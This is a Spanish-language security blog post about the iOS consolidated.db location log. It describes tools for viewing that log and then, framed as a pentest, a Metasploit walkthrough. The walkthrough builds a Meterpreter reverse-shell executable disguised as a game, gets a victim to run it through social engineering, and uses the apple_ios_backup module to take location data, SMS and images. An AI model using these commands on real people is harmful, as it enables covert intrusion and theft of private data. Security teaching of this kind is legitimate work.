Ubicando a los dueños de un iPhone o iPad

Exploiting Ubicando a los dueños de un iPhone o iPad

Hace unos días Pete Warden y Alasdair Allen publicaron una investigación en la que descubrieron un archivo con nombre  en cuyo interior se encuentra almacenado un registro de las ultimas ubicaciones donde estuviéramos con nuestro dispositivo iOS.

La noticia le dió la vuelta al mundo en poco tiempo, logrando que Steve Jobs se pronunciara al respecto y saliera con la ya típica respuesta, “no lo hacemos, nuestra competencia sí”, pero por mucho que Jobs niegue el asunto, es un hecho que el archivo existe y que en él se encuentra un registro de nuestros pasos mientras tenemos nuestro dispositivo en el bolsillo, en este artículo vamos a ver los distintos métodos que tenemos para el archivo Consolidated.db, obtener e interpretar este registro.

La primera herramienta que veremos es iPhone Tracker, publicada por Warden y  Allen junto con su investigación que de momento funciona solo en Mac OS X.

Obteniendo Geoposición de con Tracker

Primero que todo debemos obtener una copia del iPhone Tracker y para ello tenemos dos opciones

  1. Descargamos el código fuente, lo leemos y compilamos con XCode (recomendada)
  2. Descargar la aplicación compilada y ejecutarla en tu sistema

De cualquiera de las dos formas, cuando ejecutamos la aplicación tenemos algo como esto:

iPhoneTracker Ubicando a los dueños de un iPhone o iPad

Donde el punto azul es el registro de nuestra  y a medida que aumentamos el zoom de la imagen, tendremos mas detalle de este registro; Como pueden ver, el proceso es bastante sencillo y cualquier persona puede hacerlo si tienen un equipo con Mac OS X.

Pero los usuarios de windows también tienen varias herramientas para obtener este listado..

Obteniendo Geoposición de iPhone en Windows

Para sacar la posición  almacenada en el archivo consolidated.db en sistemas Microsoft Windows tenemos varias opciones, la primera iPhone Tracking for Windows.

iPhoneTrackerWin Ubicando a los dueños de un iPhone o iPad

Con el que podemos ubicar automáticamente el archivo consolidated.db de nuestro backup, delimitar las fechas en las que hicimos un recorrido y posicionar en un mapa las ultimas ubicaciones almacenadas por nuestro dispositivo.

La otra opción que tenemos en Windows es iPhoneTrackerWin, que como funcionalidad adicional, permite cargar el archivo consolidated.db de otras fuentes, por lo que si obtenemos el backup de otro iPhone, podemos visualizarlo gráficamente gracias a este software.

iPhoneTrackerWin2 Ubicando a los dueños de un iPhone o iPad

Como muchos han dicho ya el archivo consolidated.db es en realidad una base de datos en sqlite por lo que con cualquier FrontEnd de SQLite puedes visualizar la información de este archivo, aunque no gráficamente como las herramientas mencionadas anteriormente.

Obteniendo el Backup del iPhone/ con Metasploit

Si estamos realizando una auditoria de seguridad y sabemos que un funcionario de la organización auditada, cuenta con un dispositivo iOS con 3G (iPad o iPhone), podemos obtener la información de este dispositivo, por medio de un nuevo modulo con nombre apple_ios_backup desarrollado por el propio H.D. Moore, creador de nuestro framework favorito Metasploit.

Debemos tener una sección de meterpreter en el equipo donde tenemos el backup, para ello vamos a generar un binario con el meterpreter y por medio de ingeniería social, lograremos que lo ejecuten en el equipo donde se encuentra el backup.

dragon@bt:~# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.13 X > juego.exe

Mientras dejamos a la escucha el handler que recibirá la conexión del ejecutable juego.exe

dragon@bt:~# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.0.13 E

El ejecutable lo podemos empaquetar junto a cualquier otro programa  y lograr que lo corran en el equipo deseado, una vez tenemos una sección meterpreter en la maquina, ejecutamos el modulo de apple_ios_backup para sacar las bases de datos (localización, mensajes sms, imágenes, archivos de preferencias).

meterpreter > run windows/gather/apple_ios_backup

Si el equipo víctima es un Vista o Windows 7 seguramente no tendrás problemas, pero si el equipo víctima es un Windows XP en español como en mi caso, tendremos que echarle mano al archivo modules/post/windows/gather/apple_ios_backup.rb como seguramente muchas veces te ha tocado hacer y cambiar las rutas para que funcionen en los sistemas XP con idioma español.

			if os =~ /Windows 7|Vista|2008/
				@appdata = '\\AppData\\Roaming'
				@users = drive + '\\Users'
			else
				@appdata = '\\Application Data'
				@users = drive + '\\Documents and Settings'
			end

En la linea 61 cambiamos “\\Application Data” por “\\Datos de programa” y probamos de nuevo consiguiendo que el modulo creado por H.D. Moore funcione sin problemas, obteniendo los backups almacenados en la maquina.

Por último les dejo un vídeo donde Alasdair Allan habla sobre este problema en los dispositivos de Apple.

 

Espero que les sea de utilidad este texto y dejen sus comentarios abajo…


Si te ha gustado el post, compartelo y ayudanos a crecer.

Unete a nuestra Fanpage Siguenos en Twitter

Autor: DragoN

Ingeniero en Sistemas y Telecomunicaciones de la Universidad de Manizales. Information Security Researcher con más de 10 años de experiencias en Ethical Hacking, Pen Testing y Análisis Forense. Docente Universitario en Pre y Post-Grado, Speaker y Organizador de diferentes eventos de Seguridad Informática, Fundador del DragonJAR Security Conference y Fundador de DragonJAR SAS y de La Comunidad DragonJAR, una de las comunidades de seguridad informática mas grandes de habla hispana y referente en el sector.

Compartir este Artículo
  • aneraka

    excelente informaciongracias dragon

  • @dh4rm4n

    Actualmente utilizo iPod y esto no me gusto para nada, gracias por el dato, muy buenos argumentos

  • Alphafox

    Aun funciona? Se queda mucho tiempo haciendo el geolocate.

  • Eu

    Seu bosta. Traduza certo. Não apenas com o translate do Google. Babaca japonês.

  • Pingback: Análisis Forense de Dispositivos iOS – Fase de Análisis